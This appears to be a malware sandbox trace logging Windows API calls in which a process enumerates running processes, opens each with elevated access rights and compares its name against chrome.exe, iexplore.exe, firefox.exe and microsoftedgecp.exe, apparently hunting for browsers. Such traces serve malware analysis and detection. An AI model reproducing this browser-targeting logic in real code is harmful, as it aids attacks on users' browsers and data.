	[0234.016] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.017] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.017] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.017] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.017] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x723c
	[0234.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.018] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.019] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.019] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.019] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.020] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.020] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x7240
	[0234.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.020] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.021] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.021] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.021] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.022] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x7244
	[0234.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.023] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.023] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.023] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.023] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.024] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0234.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x7248
	[0234.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.025] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0234.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.025] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.025] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0234.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.025] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.026] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.026] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x724c
	[0234.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.027] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.027] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.027] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.027] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.028] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0234.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x7250
	[0234.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.029] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.029] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.029] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.030] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.030] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0234.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x7254
	[0234.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.031] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0234.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.031] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.031] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0234.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.032] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.032] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0234.033] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x7258
	[0234.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.033] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0234.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.034] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.034] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0234.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.034] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.034] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0234.035] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x725c
	[0234.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.035] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0234.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.036] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.036] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0234.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.037] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.037] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0234.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x7260
	[0234.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.039] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0234.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.039] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.039] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0234.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.039] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.040] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0234.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x7264
	[0234.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.040] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0234.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.041] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.041] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0234.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.041] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.041] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0234.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x7268
	[0234.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.042] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0234.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.043] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.043] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0234.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.043] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.043] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0234.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0234.044] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0234.045] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x726c
	[0234.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.045] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0234.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.046] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.046] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0234.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.047] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.047] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0234.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x7270
	[0234.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.048] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0234.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.049] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.049] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0234.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.049] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.049] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0234.050] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x7274
	[0234.050] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.050] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0234.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.051] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.051] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0234.051] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.052] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.052] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0234.053] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x7278
	[0234.053] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.053] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0234.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.054] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.054] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.054] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0234.055] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.055] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.055] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0234.056] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x727c
	[0234.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.056] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0234.056] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.056] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.057] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0234.057] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.057] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.058] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0234.058] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x7280
	[0234.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.059] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0234.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.059] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.059] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0234.059] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.059] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.060] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0234.060] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x7284
	[0234.060] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.060] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0234.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.061] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.061] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.061] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0234.062] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.062] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.062] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0234.063] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x7288
	[0234.063] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.063] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0234.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.064] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.064] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0234.064] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.065] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.065] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0234.066] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x728c
	[0234.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.066] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0234.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.066] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.066] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0234.066] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.067] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.067] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0234.067] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x7290
	[0234.067] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.068] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0234.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.068] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.068] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0234.068] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.068] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.068] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0234.069] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x7294
	[0234.069] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.069] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0234.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.070] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.070] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.070] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0234.071] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.071] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0234.071] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0234.072] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x7298
	[0234.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.072] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0234.072] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.072] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0234.073] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0234.073] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
